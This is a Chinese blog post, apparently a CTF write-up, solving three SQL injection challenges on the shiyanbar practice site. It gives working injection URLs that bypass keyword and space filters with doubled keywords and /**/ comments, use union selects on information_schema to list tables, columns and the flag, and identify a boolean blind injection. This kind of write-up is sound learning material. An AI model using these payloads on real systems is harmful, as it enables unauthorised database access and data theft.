实验吧三道sql注入题目解题思路以及当中至少点整理(简单的SQL注入、简单的SQL注入2、简单的SQL注入)
来源:互联网 发布:马里亚纳网络性奴 编辑:程序博客网 时间:2024/06/06 11:45
0x00
最近学习CTF有一段时间了,下面将实验吧三题题目的简单SQL注入进行一定的整理,
0x01 简单的sql注入
做题的地址为: http://ctf5.shiyanbar.com/423/web/
第一步:随便输入个数字load下url:http://ctf5.shiyanbar.com/423/web/?id=1发现是这个,老套路,既然题目提示是过滤 我们来各种试试到底过滤了什么
第二步:payload:http://ctf5.shiyanbar.com/423/web/?id=1'发现报错可以确定是字符型的注入,那来了来试试到底过滤了啥吧,尝试用payload如下:http://ctf5.shiyanbar.com/423/web/?id=1' union %23 select order by from or '1'='1,发现过滤得还挺多的基本都过滤了,好吧来试试如何绕过吧
第三步:一般的套路绕过:内联注释、双重关键字、大小写混用、编码、。。。。。算了绕WAF的比较多,这里就不总结了改日另开新帖来说吧,这里有篇文章还不错推荐给大家:http://www.bugku.com/forum.phpmod=viewthread&tid=128&extra=page%3D1
第四步:http://ctf5.shiyanbar.com/423/web/?id=1'/**/unionunion/**/selectselect/**/table_name/**/fromfrom/**/information_schema.tables/**/wherewhere/**//**/'1'='1这样尝试爆出表名来,居然报错,好吧 我来两个空格,估计是有个过滤函数,1' unionunion selectselect table_name fromfrom information_schema.tables wherewhere '1'='1这样可以得到表,
第五步:同样可以得到列名以及字段的数据最终payload如下:
1' unionunion selectselect flag fromfrom flag wherewhere '1'='1
总结:学到的知识:如何判断过滤了哪些字符;如果绕WAF
0X02简单的SQL注入2
做题地址:http://ctf5.shiyanbar.com/web/index_2.php 本来我都写好了WP了发到实验吧了发现,不知道哪里可以看到自己的WP好吧,那我就来再写一遍吧。
这题就是做起来的时候不像第一题有显示哪里出错,直接给你的就是一个检测到你有SQL注入的提示。
第一步:首先也是老套路,id=1--->id=1'这样来判定,发现过滤了空格用payload测试列数:http://ctf5.shiyanbar.com/web/index_2.php?id=1'/**/order/**/by/**/1%23得到列数为一。
第二步:同样和第一题一样来测试表名,至少这里不需要重写关键字就可以payload如下
http://ctf5.shiyanbar.com/web/index_2.php?id=1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
第三步:得到列名payload如下:
http://ctf5.shiyanbar.com/web/index_2.php?id=1'/**/union/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name='flag
后门就是老套路了过程就不表了:
学习的至少点:本来按老套路应该有 union select database()的发现居然过了了“)”后来利用前面的至少点直接插数据库所有表吧,这样暴力绕过,后门再问大佬怎么绕过吧,如果有知道的大牛欢迎留言。
ox03简单的SQL注入3
做题地址:http://ctf5.shiyanbar.com/web/index_3.php
第一步:上来先来老套路。。。http://ctf5.shiyanbar.com/web/index_3.php?id=1' http://ctf5.shiyanbar.com/web/index_3.php?id=1'%23发现可以闭合,心里总算安定了http://ctf5.shiyanbar.com/web/index_3.php?id=1' order by 2%23发现还是一行。
第二步:开始使用union 查询试探。http://ctf5.shiyanbar.com/web/index_3.php?id=33333' union select database()%23居然啥反应也没有,顿时心中不知道该如何是好啊。
第三步:难道是各种过滤绕过,不会吧。。。前面不是已经一道绕过了?一翻fuzz后来试试这个吧:http://ctf5.shiyanbar.com/web/index_3.php?id=-1' and 1=1%23发现有问题。。。。不会吧难道是bool盲注:不想写脚本,试试是不是绕过,多方试验之后发现就是bool盲注。没啥了来把写脚本吧。
第四步:脚本,先吃饭晚点发。。。
- 实验吧三道sql注入题目解题思路以及当中至少点整理(简单的SQL注入、简单的SQL注入2、简单的SQL注入)
- 实验吧简单的sql注入解题思路
- 简单的sql注入
- 实验吧 ctf 题目简单的sql注入2writeup
- 实验吧-CTF-简单的sql注入思路
- 实验吧_简单的sql注入
- 实验吧 简单的sql注入
- 实验吧简单的SQL注入
- 一个简单的SQL注入
- 简单的sql注入,安全第一
- 简单的SQL注入攻击
- 简单的sql注入WP
- Web简单的SQL注入
- 简单讲解SQL的注入以及防御
- 简单的sql注入之2WP
- 实验吧 简单的SQL注入2攻击笔记
- CTF实验吧-简单的sql注入【SQL注入关键词绕过】
- 简单sql注入防范
- 学习shiro框架
- ubuntu16.04 安装mysql5.7
- HDU 5889 最短路 网络流
- 圆的反演变换(*)
- 网易题目:集合+
- 实验吧三道sql注入题目解题思路以及当中至少点整理(简单的SQL注入、简单的SQL注入2、简单的SQL注入)
- 区间查询+位运算
- 时间复杂度和空间复杂度
- 第四章 第四节:子查询 (Subquery)
- java继承链中方法调用优先级.顺序:this.show(object)>super.show(object)>this.show((super)object)>super.show((super))
- 一对多查询(10)
- php eval
- 士兵杀敌(一)【NYOJ 108 线段树】
- 指定变量的类型及变量的间接引用